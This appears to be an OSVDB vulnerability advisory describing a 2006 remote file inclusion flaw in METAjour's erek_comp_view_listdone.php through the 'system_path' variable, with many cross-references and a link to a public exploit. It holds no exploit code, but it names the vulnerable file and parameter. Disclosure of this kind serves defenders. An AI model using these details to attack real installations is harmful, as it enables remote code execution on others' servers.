METAjour erek_comp_view_listdone.php system_path Variable Remote File Inclusion

2006-05-31T00:00:00
ID OSVDB:39445
Type osvdb
Reporter OSVDB
Modified 2006-05-31T00:00:00

Description

Vulnerability Description

METAjour contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'erek_comp_view_listdone.php' not properly sanitizing user input supplied to the 'system_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

References:

Vendor URL: http://www.metajour.org/ Secunia Advisory ID:20404 Related OSVDB ID: 39476 Related OSVDB ID: 39473 Related OSVDB ID: 39471 Related OSVDB ID: 39470 Related OSVDB ID: 39468 Related OSVDB ID: 39467 Related OSVDB ID: 39464 Related OSVDB ID: 39460 Related OSVDB ID: 39458 Related OSVDB ID: 39457 Related OSVDB ID: 39445 Related OSVDB ID: 1018390 Related OSVDB ID: 1018393 Related OSVDB ID: 1018402 Related OSVDB ID: 1018403 Related OSVDB ID: 1018405 Related OSVDB ID: 1018406 Related OSVDB ID: 1018408 Related OSVDB ID: 1018411 Related OSVDB ID: 1018412 Related OSVDB ID: 1018418 Related OSVDB ID: 1018424 Related OSVDB ID: 1018426 Related OSVDB ID: 1018428 Related OSVDB ID: 1018429 Related OSVDB ID: 1018430 Related OSVDB ID: 1018431 Related OSVDB ID: 1018432 Related OSVDB ID: 39469 Related OSVDB ID: 39463 Related OSVDB ID: 39462 Related OSVDB ID: 39461 Related OSVDB ID: 39459 Related OSVDB ID: 39456 Related OSVDB ID: 39454 Related OSVDB ID: 39453 Related OSVDB ID: 39450 Related OSVDB ID: 39447 Related OSVDB ID: 39446 Related OSVDB ID: 1018389 Related OSVDB ID: 1018395 Related OSVDB ID: 1018398 Related OSVDB ID: 1018399 Related OSVDB ID: 1018400 Related OSVDB ID: 1018401 Related OSVDB ID: 1018404 Related OSVDB ID: 1018413 Related OSVDB ID: 1018416 Related OSVDB ID: 1018425 Related OSVDB ID: 1018427 Related OSVDB ID: 39475 Related OSVDB ID: 39466 Related OSVDB ID: 39465 Related OSVDB ID: 39455 Related OSVDB ID: 39451 Related OSVDB ID: 1018391 Related OSVDB ID: 1018397 Related OSVDB ID: 1018415 Related OSVDB ID: 1018417 Related OSVDB ID: 1018419 Related OSVDB ID: 39480 Related OSVDB ID: 39474 Related OSVDB ID: 39472 Related OSVDB ID: 39452 Related OSVDB ID: 39449 Related OSVDB ID: 39448 Related OSVDB ID: 1018392 Related OSVDB ID: 1018394 Related OSVDB ID: 1018396 Related OSVDB ID: 1018407 Related OSVDB ID: 1018409 Related OSVDB ID: 1018410 Related OSVDB ID: 1018414 Related OSVDB ID: 1018420 Related OSVDB ID: 1018421 Related OSVDB ID: 1018422 Related OSVDB ID: 1018423 Generic Exploit URL: http://milw0rm.com/exploits/1855 FrSIRT Advisory: ADV-2006-2077 CVE-2006-2768 Bugtraq ID: 18211